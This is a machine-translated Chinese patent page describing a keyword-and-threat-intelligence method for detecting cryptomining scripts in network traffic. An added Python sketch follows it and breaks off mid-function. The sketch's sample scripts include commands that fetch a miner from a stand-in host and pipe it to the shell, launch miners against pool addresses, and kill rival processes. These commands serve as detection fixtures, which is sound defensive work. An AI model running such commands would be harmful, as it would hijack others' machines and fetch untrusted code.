CN115801466A - Method and device for detecting mining scripts based on traffic - Google Patents


Info

Publication number
CN115801466A
Authority
CN
China
Prior art keywords
script
script file
words
ore
word
Legal status
Granted
Application number
CN202310080142.2A
Other languages
Chinese (zh)
Other versions
CN115801466B (en
Inventor
郭静海
张福
程度
Current Assignee
Beijing Shengxin Network Technology Co ltd
Original Assignee
Beijing Shengxin Network Technology Co ltd
Application filed by Beijing Shengxin Network Technology Co ltd
Priority to CN202310080142.2A
Publication of CN115801466A
Application granted
Publication of CN115801466B
Legal status: Active

Landscapes

  • Information Retrieval, Db Structures And Fs Structures Therefor (AREA)

Abstract

The disclosure relates to a method and a device for detecting mining scripts based on network traffic. The method comprises the following steps: in response to traffic data that downloads a script file, matching threat intelligence data against the traffic data to obtain a matching result; if the match succeeds, determining, through a mining identification model, the first words in the script file that match a feature word set and the second words that match a unique word set; determining from the first words and the second words whether the script file is a mining script; and generating alarm information if the script file is a mining script. With this method and device, the traffic data of a device is matched against threat intelligence data, the feature words and unique words in the script file are determined by the mining identification model, and the mining script is identified from those two kinds of words. This supports real-time detection under high traffic volumes with fast detection and low performance overhead, and improves both the efficiency and the accuracy of mining script detection.

Description

Method and device for detecting mining scripts based on traffic
Technical Field
The disclosure relates to the technical field of computers, and in particular to a method and a device for detecting mining scripts based on traffic.
Background
With the development of blockchain technology, virtual currencies have emerged in large numbers. Because these currencies are obtained through large amounts of computation, a variety of mining trojans have appeared along with them. A mining trojan steals the computing resources of other devices, driving them to full load, slowing them down and shortening the service life of their hardware.
An attacker can exploit a vulnerable system to remotely implant a mining script file on other devices. Such a script file typically detects the operating system type in order to download the matching mining trojan and control program; inspects the operating system's processes and forcibly kills unrelated ones in order to monopolize system resources; and may also add scheduled tasks, specify an outbound connection domain name, clear history records, download an environment installation package, and so on. The impact on the device itself is large, and it inconveniences the device's real owner.
Disclosure of Invention
The disclosure provides a method and a device for detecting mining scripts based on traffic.
According to one aspect of the present disclosure, a traffic-based mining script detection method is provided, including:
in response to traffic data that downloads a script file, matching preset threat intelligence data against the traffic data to obtain a matching result;
if the matching result is a successful match, determining, through a mining identification model, first words in the script file that match a feature word set and second words that match a unique word set, where the feature word set is the set of words whose occurrence frequency in mining script samples is greater than a first threshold, and the unique word set is the set of words that appear in the mining script samples and do not appear in normal script samples;
determining whether the script file is a mining script according to the first words and the second words; and
generating alarm information if the script file is a mining script.
In some embodiments of the present disclosure, determining, through the mining identification model, the first words in the script file that match the feature word set includes:
performing word segmentation and denoising on the script file to obtain the word set of the script file;
determining the pending words in the word set, namely the words whose occurrence frequency is greater than a second threshold; and
determining the first words as those pending words that appear in the feature word set.
In some embodiments of the present disclosure, determining, through the mining identification model, the second words in the script file that match the unique word set includes:
performing word segmentation and denoising on the script file to obtain the word set of the script file; and
determining the second words as those words in the word set that appear in the unique word set.
In some embodiments of the present disclosure, determining whether the script file is a mining script according to the first words and the second words includes:
determining that the script file is a mining script if the total number of first words and second words is greater than a third threshold.
In some embodiments of the disclosure, the method further comprises:
if the matching result is a successful match but the script file is identified as not a mining script, acquiring the words that appear in the script file and do not appear in a normal script sample, and adding them to the unique word set; and
generating alarm information.
In some embodiments of the present disclosure, the method further comprises:
if the matching result is no match, determining through the mining identification model whether the script file is a mining script;
if the script file is identified as a mining script, acquiring the IP address and domain name information of the traffic data;
updating the threat intelligence data with the IP address and domain name information; and
generating alarm information.
In some embodiments of the present disclosure, the method further comprises:
if the matching result is no match and the script file is identified as not a mining script, determining that the script file is a normal script.
According to another aspect of the present disclosure, a traffic-based mining script detection apparatus is provided, including:
a matching module, configured to respond to traffic data that downloads a script file by matching preset threat intelligence data against the traffic data to obtain a matching result;
a word determination module, configured to determine, through the mining identification model, first words in the script file that match a feature word set and second words that match a unique word set when the matching result is a successful match, where the feature word set is the set of words whose occurrence frequency in mining script samples is greater than a first threshold, and the unique word set is the set of words that appear in the mining script samples and do not appear in normal script samples;
an identification module, configured to determine whether the script file is a mining script according to the first words and the second words; and
an alarm module, configured to generate alarm information if the script file is a mining script.
In some embodiments of the disclosure, the word determination module is further configured to:
perform word segmentation and denoising on the script file to obtain the word set of the script file;
determine the pending words in the word set, namely the words whose occurrence frequency is greater than a second threshold; and
determine the first words as those pending words that appear in the feature word set.
In some embodiments of the disclosure, the word determination module is further configured to:
perform word segmentation and denoising on the script file to obtain the word set of the script file; and
determine the second words as those words in the word set that appear in the unique word set.
In some embodiments of the present disclosure, the identification module is further configured to:
determine that the script file is a mining script if the total number of first words and second words is greater than a third threshold.
In some embodiments of the present disclosure, the apparatus further comprises a word set update module, configured to:
if the matching result is a successful match but the script file is identified as not a mining script, acquire the words that appear in the script file and do not appear in a normal script sample, and add them to the unique word set; and
generate alarm information.
In some embodiments of the disclosure, the apparatus further comprises a threat intelligence data update module, configured to:
if the matching result is no match, determine through the mining identification model whether the script file is a mining script;
if the script file is identified as a mining script, acquire the IP address and domain name information of the traffic data;
update the threat intelligence data with the IP address and domain name information; and
generate alarm information.
In some embodiments of the present disclosure, the apparatus further comprises a normal script confirmation module, configured to determine that the script file is a normal script if the matching result is no match and the script file is identified as not a mining script.
According to another aspect of the present disclosure, a traffic-based mining script detection apparatus is provided, including: a processor; and a memory for storing processor-executable instructions; where the processor is configured to invoke the instructions stored in the memory to perform the method described above.
According to another aspect of the present disclosure, a computer-readable storage medium is provided, having stored thereon computer program instructions which, when executed by a processor, implement the method described above.
With the traffic-based mining script detection method of the present disclosure, the traffic data of a device is matched against threat intelligence data; if the match succeeds, the feature words and unique words in the script file are determined by the mining identification model, and the mining script is identified from those two kinds of words. This supports real-time detection under high traffic volumes with fast detection and low performance overhead, and improves both the efficiency and the accuracy of mining script detection. In addition, the unique word set, the feature word set and the threat intelligence data can be updated continuously during identification, which amounts to a self-learning process: fewer samples are needed for learning, and identification accuracy keeps improving.
It is to be understood that both the foregoing general description and the following detailed description are exemplary and explanatory only and are not restrictive of the disclosure. Other features and aspects of the present disclosure will become more apparent from the following detailed description of exemplary embodiments with reference to the attached drawings.
Drawings
The accompanying drawings, which are incorporated in and constitute a part of this specification, illustrate embodiments consistent with the present disclosure and, together with the description, serve to explain the principles of the disclosure.
FIG. 1 shows a flowchart of a traffic-based mining script detection method according to an embodiment of the present disclosure;
FIG. 2 shows an application diagram of a traffic-based mining script detection method according to an embodiment of the present disclosure;
FIG. 3 shows a block diagram of a traffic-based mining script detection apparatus according to an embodiment of the present disclosure;
FIG. 4 shows a block diagram of a traffic-based mining script detection apparatus according to an embodiment of the present disclosure;
FIG. 5 shows a block diagram of an electronic device according to an embodiment of the present disclosure.
Detailed Description
Various exemplary embodiments, features and aspects of the present disclosure will be described in detail below with reference to the accompanying drawings. In the drawings, like reference numbers can indicate functionally identical or similar elements. While the various aspects of the embodiments are presented in drawings, the drawings are not necessarily drawn to scale unless specifically indicated.
The word "exemplary" is used herein exclusively to mean "serving as an example, embodiment, or illustration". Any embodiment described herein as "exemplary" is not necessarily to be construed as preferred or advantageous over other embodiments.
The term "and/or" herein merely describes an association between associated objects and means that three relationships may exist; for example, "A and/or B" may mean that A exists alone, that A and B exist simultaneously, or that B exists alone. In addition, the term "at least one" herein means any one of a variety or any combination of at least two of a variety; for example, "including at least one of A, B and C" may mean including any one or more elements selected from the group consisting of A, B and C.
Furthermore, in the following detailed description, numerous specific details are set forth in order to provide a better understanding of the present disclosure. It will be understood by those skilled in the art that the present disclosure may be practiced without some of these specific details. In some instances, methods, means, elements and circuits that are well known to those skilled in the art have not been described in detail so as not to obscure the present disclosure.
To address the problems in the related art, the traffic data of a device is matched against threat intelligence data; if the match succeeds, the feature words and unique words in the script file are determined by the mining identification model, and the mining script is then identified from those two kinds of words. This supports real-time detection under high traffic volumes with fast detection and low performance overhead, and improves both the efficiency and the accuracy of mining script detection.
Fig. 1 shows a flowchart of a traffic-based mining script detection method. As shown in Fig. 1, the method comprises:
step S11, in response to traffic data that downloads a script file, matching preset threat intelligence data against the traffic data to obtain a matching result;
step S12, if the matching result is a successful match, determining, through a mining identification model, first words in the script file that match a feature word set and second words that match a unique word set, where the feature word set is the set of words whose occurrence frequency in mining script samples is greater than a first threshold, and the unique word set is the set of words that appear in the mining script samples and do not appear in normal script samples;
step S13, determining whether the script file is a mining script according to the first words and the second words; and
step S14, generating alarm information if the script file is a mining script.
In some embodiments of the present disclosure, while a device (for example, an electronic device such as a computer or a mobile phone) is running, a malicious attack on it produces traffic data from the attacker's access. For example, the attacker accesses the device over the internet and remotely downloads a script file, which may be a mining script; once downloaded and executed, the script file occupies the device's running resources, which inconveniences the device's user and harms the device.
Fig. 2 shows an application diagram of a traffic-based mining script detection method according to an embodiment of the present disclosure.
In some embodiments of the present disclosure, in step S11, the preset threat intelligence data records domain names or IP addresses known to be threats. If the visitor's domain name or IP address matches a record in the threat intelligence data, the traffic data is considered a security risk, and the script file downloaded in that traffic may be a mining script.
In some embodiments of the present disclosure, in step S12, a mining identification model determines whether the script downloaded in the traffic data is a mining script. The determination uses the feature word set and the unique word set.
In some embodiments of the present disclosure, the feature word set is obtained by counting the words that appear across a plurality of mining script samples. The feature words in this set occur frequently in the mining script samples, for example with a frequency greater than a first threshold, so they can serve as representative words of mining scripts: if a script file contains a large number of feature words, the probability that it is a mining script is high.
In some embodiments of the present disclosure, feature words alone cannot accurately determine whether a given script file is a mining script, and the accuracy of the determination can be further improved with the unique words. In addition to counting the words in the plurality of mining script samples, the words in normal script samples (non-mining scripts) are also counted, and the words that appear only in the mining script samples and never in the normal script samples are determined. These words serve as the unique words of mining scripts, and the set they form is the unique word set. If a script file contains a large number of words that appear only in mining script samples, the probability that it is a mining script is high. Using the feature word set and the unique word set together therefore improves the accuracy of the mining script determination.
In some embodiments of the present disclosure, in step S12, the first words in the script file that match the feature word set and the second words that match the unique word set are determined; that is, the feature words and the unique words present in the script file are found.
In some embodiments of the present disclosure, determining, through the mining identification model, the first words in the script file that match the feature word set includes: performing word segmentation and denoising on the script file to obtain the word set of the script file; determining the pending words in the word set, namely the words whose occurrence frequency is greater than a second threshold; and determining the first words as those pending words that appear in the feature word set.
In some embodiments of the present disclosure, the word segmentation and denoising may be performed with any word segmentation algorithm from the related art; the present disclosure does not limit the specific manner of word segmentation and denoising. After this processing, the word set of the script file is obtained.
In some embodiments of the present disclosure, the pending words are the words in the word set whose occurrence frequency is greater than a second threshold. The second threshold may be the same as or different from the first threshold; the present disclosure does not limit this.
In some embodiments of the present disclosure, the first words are the pending words that appear in the feature word set; that is, the intersection of the pending words and the feature word set is determined, and the words in that intersection are the first words.
In some embodiments of the present disclosure, determining, through the mining identification model, the second words in the script file that match the unique word set includes: performing word segmentation and denoising on the script file to obtain the word set of the script file; and determining the second words as those words in the word set that appear in the unique word set.
In some embodiments of the present disclosure, the word segmentation and denoising are as described above and are not repeated here. Alternatively, the word set obtained above may be reused directly.
In some embodiments of the present disclosure, the second words are the words in the word set that appear in the unique word set; that is, the intersection of the unique word set and the word set is determined, and the words in that intersection are the second words.
In some embodiments of the present disclosure, in step S13, whether the script file is a mining script is determined jointly from the first words and the second words, which improves the accuracy of the determination. In one example, the total number of first words and second words is computed, and if that total is greater than a third threshold, the script file is determined to be a mining script.
In some embodiments of the present disclosure, in step S14, if the script file is determined to be a mining script, alarm information is generated to prompt the device or its user to take measures, for example isolating or deleting the script file so that it is never executed and the device is protected from the attack.
In some embodiments of the present disclosure, family identification may also be performed on the script file before the alarm information is generated, for example to identify the family of mining scripts to which the script file belongs. The present disclosure does not limit the particular manner of family identification.
In some embodiments of the disclosure, the method further comprises: if the matching result is a successful match but the script file is identified as not a mining script, acquiring the words that appear in the script file and do not appear in a normal script sample, adding them to the unique word set, and generating alarm information. That is, when the traffic data matches the threat intelligence data but the mining identification model judges that the script file is not a mining script, the script file is nevertheless classified as a mining script, and its unique words are counted and added to the unique word set, which improves the accuracy of later determinations that use the unique word set. Furthermore, the feature words in this mining script may be counted and added to the feature word set, further improving the accuracy of determinations that use the feature word set. The script file may then undergo family identification, alarm information generation, and so on.
In this way the mining identification model learns automatically: when a script file is determined to be a mining script that the mining identification model failed to identify, the unique word set and the feature word set are updated from the words of that script file, so the accuracy of subsequent determinations by the mining identification model improves.
In some embodiments of the present disclosure, the method further comprises: if the matching result is no match, determining through the mining identification model whether the script file is a mining script; if the script file is identified as a mining script, acquiring the IP address and domain name information of the traffic data; updating the threat intelligence data with the IP address and domain name information; and generating alarm information.
In some embodiments of the disclosure, if the traffic data does not match the threat intelligence data, that is, the traffic does not come from a known threatening domain name or IP address, but the mining identification model identifies the script file as a mining script, the script file is determined to be a mining script. Because the previously unknown domain name or IP address that accessed the device exhibited malicious access behaviour (namely, causing the device to download a mining script), that domain name or IP address is added to the threat intelligence data as a known threat. If the same IP address or domain name accesses the device again later, the access can then be determined to be malicious directly. Family identification may also be performed on the mining script, and alarm information generated.
In this way the threat intelligence data is updated automatically whenever a mining script arrives from an unknown domain name or IP address, which enriches the threat intelligence data and widens the device's detection coverage.
In some embodiments of the disclosure, the method further comprises: if the matching result is no match and the script file is identified as not a mining script, determining that the script file is a normal script. That is, when the traffic data does not come from a threatening IP address or domain name and the mining identification model determines that the script file is not a mining script, the script is a normal script and may be processed as usual without isolation or deletion, minimizing the impact on legitimate access.
With the traffic-based mining script detection method of the present disclosure, the traffic data of a device is matched against threat intelligence data; if the match succeeds, the feature words and unique words in the script file are determined by the mining identification model, and the mining script is then identified from those two kinds of words. This supports real-time detection under high traffic volumes with fast detection and low performance overhead, and improves both the efficiency and the accuracy of mining script detection. In addition, the unique word set, the feature word set and the threat intelligence data can be updated continuously during identification, which amounts to a self-learning process: fewer samples are needed for learning, and identification accuracy keeps improving.
Fig. 3 shows a block diagram of a traffic-based mining script detection apparatus. As shown in Fig. 3, the apparatus comprises:
a matching module 11, configured to respond to traffic data that downloads a script file by matching preset threat intelligence data against the traffic data to obtain a matching result;
a word determination module 12, configured to determine, through the mining identification model, first words in the script file that match the feature word set and second words that match the unique word set when the matching result is a successful match, where the feature word set is the set of words whose occurrence frequency in mining script samples is greater than a first threshold, and the unique word set is the set of words that appear in the mining script samples and do not appear in normal script samples;
an identification module 13, configured to determine whether the script file is a mining script according to the first words and the second words; and
an alarm module 14, configured to generate alarm information if the script file is a mining script.
In some embodiments of the disclosure, the term determination module is further to:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining undetermined words with the occurrence frequency larger than a second threshold value in the word set;
determining the first word appearing in the feature word set among the pending words.
In some embodiments of the disclosure, the term determination module is further to:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
in the set of words, the second word appearing in the set of characteristic words is determined.
In some embodiments of the present disclosure, the identification module is further configured to:
determining that the script file is a mine excavation script if the total number of the first terms and the second terms is greater than a third threshold.
In some embodiments of the present disclosure, the apparatus further comprises a word set update module configured to:
when the matching result is a successful match and the script file is identified as not being a mining script, acquire the special words that appear in the script file and do not appear in the normal script samples, and add those special words to the special word set;
and generate alarm information.
In some embodiments of the disclosure, the apparatus further comprises a threat intelligence data update module configured to:
determine, by the mining identification model, whether the script file is a mining script when the matching result is no match;
acquire the IP address and domain name information of the flow data when the script file is identified as a mining script;
update the threat intelligence data with the IP address and the domain name information;
and generate alarm information.
In some embodiments of the present disclosure, the apparatus further comprises a normal script confirming module configured to determine that the script file is a normal script when the matching result is no match and the script file is identified as not being a mining script.
In some embodiments, functions of or modules included in the apparatus provided in the embodiments of the present disclosure may be used to execute the method described in the above method embodiments, and specific implementation thereof may refer to the description of the above method embodiments, and for brevity, will not be described again here.
Embodiments of the present disclosure also provide a computer-readable storage medium having stored thereon computer program instructions, which when executed by a processor, implement the above-mentioned method. The computer readable storage medium may be a non-volatile computer readable storage medium.
An embodiment of the present disclosure further provides an electronic device, including: a processor; a memory for storing processor-executable instructions; wherein the processor is configured to invoke the memory-stored instructions to perform the above-described method.
The disclosed embodiments also provide a computer program product including computer readable code, and when the computer readable code runs on a device, a processor in the device executes instructions for implementing the flow-based mining script detection method provided in any of the above embodiments.
The embodiments of the present disclosure also provide another computer program product for storing computer readable instructions, where the instructions, when executed, cause a computer to perform the operations of the flow-based mining script detection method provided in any of the above embodiments.
The electronic device may be provided as a terminal, server, or other form of device.
FIG. 4 illustrates a block diagram of a flow-based mining script detection apparatus 800 according to an embodiment of the present disclosure. For example, the device 800 may be a mobile phone, a computer, a digital broadcast terminal, a messaging device, a game console, a tablet device, a medical device, an exercise device, a personal digital assistant, and the like.
Referring to fig. 4, device 800 may include one or more of the following components: a processing component 802, a memory 804, a power component 806, a multimedia component 808, an audio component 810, an input/output interface 812, a sensor component 814, and a communication component 816.
The processing component 802 generally controls overall operation of the device 800, such as operations associated with display, telephone calls, data communications, camera operations, and recording operations. The processing component 802 may include one or more processors 820 to execute instructions to perform all or a portion of the steps of the methods described above. Further, the processing component 802 can include one or more modules that facilitate interaction between the processing component 802 and other components. For example, the processing component 802 can include a multimedia module to facilitate interaction between the multimedia component 808 and the processing component 802.
The memory 804 is configured to store various types of data to support operation at the device 800. Examples of such data include instructions for any application or method operating on device 800, contact data, phonebook data, messages, pictures, videos, and so forth. The memory 804 may be implemented by any type or combination of volatile or non-volatile memory devices, such as Static Random Access Memory (SRAM), electrically erasable programmable read-only memory (EEPROM), erasable programmable read-only memory (EPROM), programmable read-only memory (PROM), read-only memory (ROM), magnetic memory, flash memory, magnetic or optical disks.
The power component 806 provides power to the various components of the device 800. The power components 806 may include a power management system, one or more power supplies, and other components associated with generating, managing, and distributing power for the device 800.
The multimedia component 808 includes a screen that provides an output interface between the device 800 and a user. In some embodiments, the screen may include a Liquid Crystal Display (LCD) and a Touch Panel (TP). If the screen includes a touch panel, the screen may be implemented as a touch screen to receive an input signal from a user. The touch panel includes one or more touch sensors to sense touch, slide, and gestures on the touch panel. The touch sensor may not only sense an edge of a touch or slide action, but also detect a duration and pressure associated with the touch or slide operation. In some embodiments, the multimedia component 808 includes a front facing camera and/or a rear facing camera. The front-facing camera and/or the rear-facing camera may receive external multimedia data when the device 800 is in an operating mode, such as a shooting mode or a video mode. Each front camera and rear camera may be a fixed optical lens system or have a focal length and optical zoom capability.
The audio component 810 is configured to output and/or input audio signals. For example, the audio component 810 includes a Microphone (MIC) configured to receive external audio signals when the device 800 is in an operational mode, such as a call mode, a recording mode, and a voice recognition mode. The received audio signals may further be stored in the memory 804 or transmitted via the communication component 816. In some embodiments, audio component 810 also includes a speaker for outputting audio signals.
The input/output interface 812 provides an interface between the processing component 802 and peripheral interface modules, which may be keyboards, click wheels, buttons, etc. These buttons may include, but are not limited to: a home button, a volume button, a start button, and a lock button.
The sensor assembly 814 includes one or more sensors for providing various aspects of state assessment for the device 800. For example, the sensor assembly 814 may detect the open/closed state of the device 800 and the relative positioning of components, such as a display and keypad of the device 800. The sensor assembly 814 may also detect a change in the position of the device 800 or of components within the device 800, the presence or absence of user contact with the device 800, the orientation or acceleration/deceleration of the device 800, and a change in the temperature of the device 800. The sensor assembly 814 may include a proximity sensor configured to detect the presence of a nearby object without any physical contact. The sensor assembly 814 may also include a light sensor, such as a CMOS or CCD image sensor, for use in imaging applications. In some embodiments, the sensor assembly 814 may also include an acceleration sensor, a gyroscope sensor, a magnetic sensor, a pressure sensor, or a temperature sensor.
The communication component 816 is configured to facilitate wired or wireless communication between the device 800 and other devices. The device 800 may access a wireless network based on a communication standard, such as WiFi, 2G or 3G, or a combination thereof. In an exemplary embodiment, the communication component 816 receives a broadcast signal or broadcast-related information from an external broadcast management system via a broadcast channel. In an exemplary embodiment, the communication component 816 further includes a Near Field Communication (NFC) module to facilitate short-range communication. For example, the NFC module may be implemented based on Radio Frequency Identification (RFID) technology, Infrared Data Association (IrDA) technology, Ultra Wideband (UWB) technology, Bluetooth (BT) technology, and other technologies.
In an exemplary embodiment, the device 800 may be implemented by one or more Application Specific Integrated Circuits (ASICs), Digital Signal Processors (DSPs), Digital Signal Processing Devices (DSPDs), Programmable Logic Devices (PLDs), Field Programmable Gate Arrays (FPGAs), controllers, micro-controllers, microprocessors or other electronic components for performing the above-described methods.
In an exemplary embodiment, a non-transitory computer-readable storage medium, such as the memory 804, is also provided that includes computer program instructions executable by the processor 820 of the device 800 to perform the above-described methods.
Fig. 5 illustrates a block diagram of an electronic device 1900 in accordance with an embodiment of the disclosure. For example, the electronic device 1900 may be provided as a server. Referring to fig. 5, electronic device 1900 includes a processing unit 1922, which further includes one or more processors and memory resources, represented by storage unit 1932, for storing instructions, e.g., applications, that are executable by processing unit 1922. The application programs stored in the storage unit 1932 may include one or more modules each corresponding to a set of instructions. Further, processing unit 1922 is configured to execute instructions to perform the above-described method.
The electronic device 1900 may further include a power module 1926 configured to perform power management of the electronic device 1900, a wired or wireless network interface 1950 configured to connect the electronic device 1900 to a network, and an I/O interface 1958. The electronic device 1900 may operate based on an operating system stored in the storage unit 1932, such as Windows Server™, Mac OS X™, Unix™, Linux™, FreeBSD™ or the like.
In an exemplary embodiment, a non-volatile computer-readable storage medium, such as the storage unit 1932, is also provided that includes computer program instructions that are executable by the processing unit 1922 of the electronic device 1900 to perform the above-described method.
The present disclosure may be systems, methods, and/or computer program products. The computer program product may include a computer-readable storage medium having computer-readable program instructions embodied thereon for causing a processor to implement various aspects of the present disclosure.
The computer readable storage medium may be a tangible device that can hold and store the instructions for use by the instruction execution device. The computer readable storage medium may be, for example, but not limited to, an electronic memory device, a magnetic memory device, an optical memory device, an electromagnetic memory device, a semiconductor memory device, or any suitable combination of the foregoing. More specific examples (a non-exhaustive list) of the computer readable storage medium would include the following: a portable computer diskette, a hard disk, a Random Access Memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), a Static Random Access Memory (SRAM), a portable compact disc read-only memory (CD-ROM), a Digital Versatile Disc (DVD), a memory stick, a floppy disk, a mechanical coding device, such as a punch card or an in-groove protruding structure with instructions stored thereon, and any suitable combination of the foregoing. Computer-readable storage media as used herein is not to be construed as transitory signals per se, such as radio waves or other freely propagating electromagnetic waves, electromagnetic waves propagating through a waveguide or other transmission medium (e.g., optical pulses through a fiber optic cable), or electrical signals transmitted through electrical wires.
The computer-readable program instructions described herein may be downloaded from a computer-readable storage medium to a respective computing/processing device, or to an external computer or external storage device via a network, such as the internet, a local area network, a wide area network, and/or a wireless network. The network may include copper transmission cables, fiber optic transmission, wireless transmission, routers, firewalls, switches, gateway computers and/or edge servers. The network adapter card or network interface in each computing/processing device receives the computer-readable program instructions from the network and forwards the computer-readable program instructions for storage in a computer-readable storage medium in the respective computing/processing device.
The computer program instructions for carrying out operations of the present disclosure may be assembler instructions, Instruction Set Architecture (ISA) instructions, machine-related instructions, microcode, firmware instructions, state setting data, or source or object code written in any combination of one or more programming languages, including an object oriented programming language such as Smalltalk, C++ or the like and conventional procedural programming languages, such as the "C" programming language or similar programming languages. The computer-readable program instructions may execute entirely on the user's computer, partly on the user's computer, as a stand-alone software package, partly on the user's computer and partly on a remote computer, or entirely on the remote computer or server. In the case of a remote computer, the remote computer may be connected to the user's computer through any type of network, including a Local Area Network (LAN) or a Wide Area Network (WAN), or the connection may be made to an external computer (for example, through the Internet using an Internet service provider). In some embodiments, electronic circuitry that can execute the computer-readable program instructions, such as a programmable logic circuit, a Field Programmable Gate Array (FPGA), or a Programmable Logic Array (PLA), implements aspects of the present disclosure by utilizing the state information of the computer-readable program instructions to personalize the electronic circuitry.
Various aspects of the present disclosure are described herein with reference to flowchart illustrations and/or block diagrams of methods, apparatus (systems) and computer program products according to embodiments of the disclosure. It will be understood that each block of the flowchart illustrations and/or block diagrams, and combinations of blocks in the flowchart illustrations and/or block diagrams, can be implemented by computer-readable program instructions.
These computer-readable program instructions may be provided to a processor of a general purpose computer, special purpose computer, or other programmable data processing apparatus to produce a machine, such that the instructions, which execute via the processor of the computer or other programmable data processing apparatus, create means for implementing the functions/acts specified in the flowchart and/or block diagram block or blocks. These computer-readable program instructions may also be stored in a computer-readable storage medium that can direct a computer, programmable data processing apparatus, and/or other devices to function in a particular manner, such that the computer-readable medium storing the instructions comprises an article of manufacture including instructions which implement the function/act specified in the flowchart and/or block diagram block or blocks.
The computer readable program instructions may also be loaded onto a computer, other programmable data processing apparatus, or other devices to cause a series of operational steps to be performed on the computer, other programmable apparatus or other devices to produce a computer implemented process such that the instructions which execute on the computer, other programmable apparatus or other devices implement the functions/acts specified in the flowchart and/or block diagram block or blocks.
The flowchart and block diagrams in the figures illustrate the architecture, functionality, and operation of possible implementations of systems, methods and computer program products according to various embodiments of the present disclosure. In this regard, each block in the flowchart or block diagrams may represent a module, segment, or portion of instructions, which comprises one or more executable instructions for implementing the specified logical function(s). In some alternative implementations, the functions noted in the block may occur out of the order noted in the figures. For example, two blocks shown in succession may, in fact, be executed substantially concurrently, or the blocks may sometimes be executed in the reverse order, depending upon the functionality involved. It will also be noted that each block of the block diagrams and/or flowchart illustration, and combinations of blocks in the block diagrams and/or flowchart illustration, can be implemented by special purpose hardware-based systems which perform the specified functions or acts, or combinations of special purpose hardware and computer instructions.
The computer program product may be embodied in hardware, software or a combination thereof. In an alternative embodiment, the computer program product is embodied in a computer storage medium, and in another alternative embodiment, the computer program product is embodied in a Software product, such as a Software Development Kit (SDK), or the like.
Having described embodiments of the present disclosure, the foregoing description is intended to be exemplary, not exhaustive, and not limited to the disclosed embodiments. Many modifications and variations will be apparent to those of ordinary skill in the art without departing from the scope and spirit of the described embodiments. The terminology used herein is chosen in order to best explain the principles of the embodiments, the practical application, or improvements made to the technology in the marketplace, or to enable others of ordinary skill in the art to understand the embodiments disclosed herein.

Claims (10)

1. A flow-based mining script detection method, characterized by comprising the following steps:
in response to the flow data generating a script file download operation, performing matching processing between preset threat intelligence data and the flow data to obtain a matching result;
when the matching result is a successful match, determining, by a mining identification model, first words in the script file that match a feature word set and second words that match a special word set, wherein the feature word set is a set of words whose occurrence frequency in mining script samples is greater than a first threshold, and the special word set is a set of words that occur in the mining script samples and do not occur in normal script samples;
determining whether the script file is a mining script according to the first words and the second words;
and generating alarm information when the script file is a mining script.
2. The method according to claim 1, wherein determining, by the mining identification model, the first words in the script file that match the feature word set comprises:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining pending words whose occurrence frequency in the word set is greater than a second threshold;
determining, among the pending words, the first words that appear in the feature word set.
3. The flow-based mining script detection method of claim 1, wherein determining, by the mining identification model, the second words in the script file that match the special word set comprises:
performing word segmentation and denoising processing on the script file to obtain a word set of the script file;
determining, in the word set, the second words that appear in the special word set.
4. The flow-based mining script detection method of claim 1, wherein determining whether the script file is a mining script according to the first words and the second words comprises:
determining that the script file is a mining script when the total number of the first words and the second words is greater than a third threshold.
5. The flow-based mining script detection method of claim 1, further comprising:
when the matching result is a successful match and the script file is identified as not being a mining script, acquiring the special words that appear in the script file and do not appear in the normal script samples, and adding those special words to the special word set;
and generating alarm information.
6. The flow-based mining script detection method of claim 1, further comprising:
determining, by the mining identification model, whether the script file is a mining script when the matching result is no match;
acquiring the IP address and domain name information of the flow data when the script file is identified as a mining script;
updating the threat intelligence data with the IP address and the domain name information;
and generating alarm information.
7. The flow-based mining script detection method of claim 6, further comprising:
determining that the script file is a normal script when the matching result is no match and the script file is identified as not being a mining script.
8. A flow-based mining script detection apparatus, characterized by comprising:
a matching module configured to, in response to the flow data generating a script file download operation, perform matching processing between preset threat intelligence data and the flow data to obtain a matching result;
a word determining module configured to determine, by a mining identification model, first words in the script file that match a feature word set and second words that match a special word set when the matching result is a successful match, wherein the feature word set is a set of words whose occurrence frequency in mining script samples is greater than a first threshold, and the special word set is a set of words that occur in the mining script samples and do not occur in normal script samples;
a recognition module configured to determine whether the script file is a mining script according to the first words (feature words) and the second words (special words);
and an alarm module configured to generate alarm information when the script file is a mining script.
9. A flow-based mining script detection apparatus, comprising:
a processor;
a memory for storing processor-executable instructions;
wherein the processor is configured to invoke the memory-stored instructions to perform the method of any of claims 1 to 7.
10. A computer-readable storage medium having computer program instructions stored thereon which, when executed by a processor, implement the method of any one of claims 1-7.
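The apparatus modules above and the method steps of claims 1 to 7 describe one detection procedure. The following Python sketch is an added example, not code from the patent or its assignee: it implements that procedure end to end over constructed sample scripts, constructed threat-intelligence indicators on reserved documentation addresses and .example hosts, and assumed thresholds (first threshold 2, second threshold 1, third threshold 4), since the patent names the thresholds but gives no values.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed corpora standing in for the patent's mining and normal script samples;
# hosts use reserved .example names and nothing here is a real payload.
MINING_SAMPLES = [
    "pkill -f xmrig\ncurl -s http://pool.example/xmrig -o /tmp/xmrig\nchmod +x /tmp/xmrig\n"
    "/tmp/xmrig -o stratum+tcp://pool.example:3333 -u wallet --donate-level 1",
    "wget -q http://cdn.example/minerd\nnohup ./minerd --algo cryptonight "
    "-o stratum+tcp://cdn.example:4444 -u wallet &\ncrontab -l",
    "curl -fsSL http://pool.example/xmrig | sh\nkillall minerd\n"
    "nohup xmrig -o stratum+ssl://pool.example:443 --donate-level 0 &",
]
NORMAL_SAMPLES = [
    "curl -fsSL https://repo.example/install.sh | sh\napt-get update\napt-get install -y nginx",
    "wget https://cdn.example/app.tar.gz\ntar xzf app.tar.gz\nchmod +x app/run.sh\nnohup app/run.sh &",
    "crontab -l\npkill -f oldagent\nsystemctl restart agent",
]
THREAT_INTEL = {"198.51.100.23", "pool.example"}              # constructed IP/domain indicators
FIRST_THRESHOLD, SECOND_THRESHOLD, THIRD_THRESHOLD = 2, 1, 4  # assumed; the patent gives no values
NOISE = {"the", "and", "for", "bin", "usr", "bash", "echo", "http", "https", "tmp"}


def tokenize(script):
    # Word segmentation plus denoising (claims 2 and 3): identifier-like tokens,
    # lower-cased, at least three characters long and not on the noise list.
    words = re.findall(r"[A-Za-z_][A-Za-z0-9_]*", script)
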